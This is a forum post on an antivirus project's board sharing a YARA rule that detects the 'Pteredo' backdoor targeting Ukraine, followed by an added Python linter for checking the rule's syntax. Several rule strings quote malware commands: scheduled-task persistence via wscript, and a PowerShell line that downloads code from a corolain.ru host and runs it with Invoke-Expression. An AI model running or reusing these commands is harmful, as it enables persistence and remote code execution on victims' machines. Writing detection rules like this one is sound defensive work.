Yara Signature For New Pteredo Malware Targeting Ukraine
GuitarBob
Joined: 09 Jul 2006 | Posts: 9 | Location: USA
Posted: Wed Apr 20, 2022 6:12 pm
Below is a Yara signature for a new Russian backdoor targeting Ukraine computers. I didn't get any scan errors, so it should work. Copy the file to a new Notepad file from the word rule to the ending } and save it as a file named Pteredo.yar in the ClamWin database folder. Save it in All Files format and make sure there is nothing in the name except Pteredo.yar only. After you save it, scan a file with ClamWin to make sure it works. If there is a problem, please accept my apologies, and delete the file from the ClamWin database folder.
Unlike the usual mdb or hdb hash signatures, Yara sigs should keep for a long time, so keep it around--it may come in handy if you take your laptop to Ukraine.
Regards,
rule indications_of_Russian_Pteredo_malware_targeting_Ukraine
{
    strings:
        // Inner double quotes and backslashes are escaped so each value compiles as a single text string.
        $a = "createObject(\"Shell.Application\").ShellExecute \"SCHTASKS\", \"/CREATE /sc minute /mo 10 /tn \" + \"\"\"UDPSync\"\" /tr \"\"wscript.exe \"\"\" + hailJPT + \"\"\"\" & \" jewels //b joking //e VBScript joyful \"\" /F \", \"\" , \"\" , 0"
        $b = "\"wscript \"[USERNAME]\\lubszfpsqcrblebyb.tbi\" //e:VBScript /w /ylq /ib /bxk //b /pgs\""
        // $c has the same content as $b; kept as posted.
        $c = "\"wscript \"[USERNAME]\\lubszfpsqcrblebyb.tbi\" //e:VBScript /w /ylq /ib /bxk //b /pgs\""
        $d = "cvjABuNZjtPirKYVchnpGVop = \"$tmp = $(New-Object net.webclient).DownloadString('https://'+ [System.Net.DNS]::GetHostAddresses([string]$(Get-Random)+'.corolain.ru') +'/get.php'); Invoke-Expression $tmp\""
        $e = "wscript \"[USERPROFILE]\\atwuzxsjiobk.ql\" //e:VBScript /tfj /vy /g /cjr /rxia //b /pyvc"
    condition:
        any of them
}
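A rule file like the one above only compiles if the rule name is a single identifier and every double quote or backslash inside a text string is escaped. The Python check below is an added example, not part of the original post or of ClamWin; `lint_rule` and `check_text_string` are hypothetical helper names, the two sample rules are constructed from the `$e` string, and the escape and modifier lists cover only a subset of YARA's grammar.

```python
import re

# Added example: the escape and modifier lists are a subset of YARA's grammar.
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,127}")
BODY = re.compile(r'"(?:[^"\\]|\\(?:["\\tn]|x[0-9A-Fa-f]{2}))*')
MODIFIERS = re.compile(r"(?:(?:ascii|wide|nocase|fullword)\s*)*")

def check_text_string(literal):
    """Return None if `literal` is one well-formed text string, else a reason."""
    s = literal.strip()
    if s[:1] != '"':                 # hex ({..}) and regex (/../) strings are skipped
        return None if s[:1] in ("{", "/") else "expected a quoted text string"
    end = BODY.match(s).end()        # stops at the first quote or bad backslash
    if end == len(s):
        return "unterminated string"
    if s[end] == "\\":
        return f"bad escape at column {end}"
    if MODIFIERS.fullmatch(s[end + 1:].strip()):
        return None                  # the quote at `end` really closes the string
    return f"unescaped quote at column {end}"

def lint_rule(text):
    """Return [(line_number, reason), ...] for the text of a rule file."""
    problems = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line.startswith("rule "):
            name = line[5:].split("{")[0].split(":")[0].strip()
            if not IDENT.fullmatch(name):
                problems.append((n, "rule name is not a valid identifier"))
        m = re.match(r"\$\w*\s*=\s*(.*)$", line)
        if m and (reason := check_text_string(m.group(1))):
            problems.append((n, reason))
    return problems

# Constructed samples modelled on the $e string in the post.
BROKEN = r'''rule indications of Pteredo malware {
strings:
$e = "wscript "[USERPROFILE]\atwuzxsjiobk.ql" //e:VBScript //b"
condition: any of them
}'''
FIXED = r'''rule indications_of_Pteredo_malware {
strings:
$e = "wscript \"[USERPROFILE]\\atwuzxsjiobk.ql\" //e:VBScript //b"
condition: any of them
}'''

if __name__ == "__main__":
    print(lint_rule(BROKEN), lint_rule(FIXED))
```

Running the check on Pteredo.yar before copying it into the database folder points at the line to fix if the scanner rejects the rule.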
All times are GMT
Content © ClamWin Free Antivirus GNU GPL Free Software Open Source Virus Scanner. Free Windows Antivirus. Stay Virus Free with Free Software.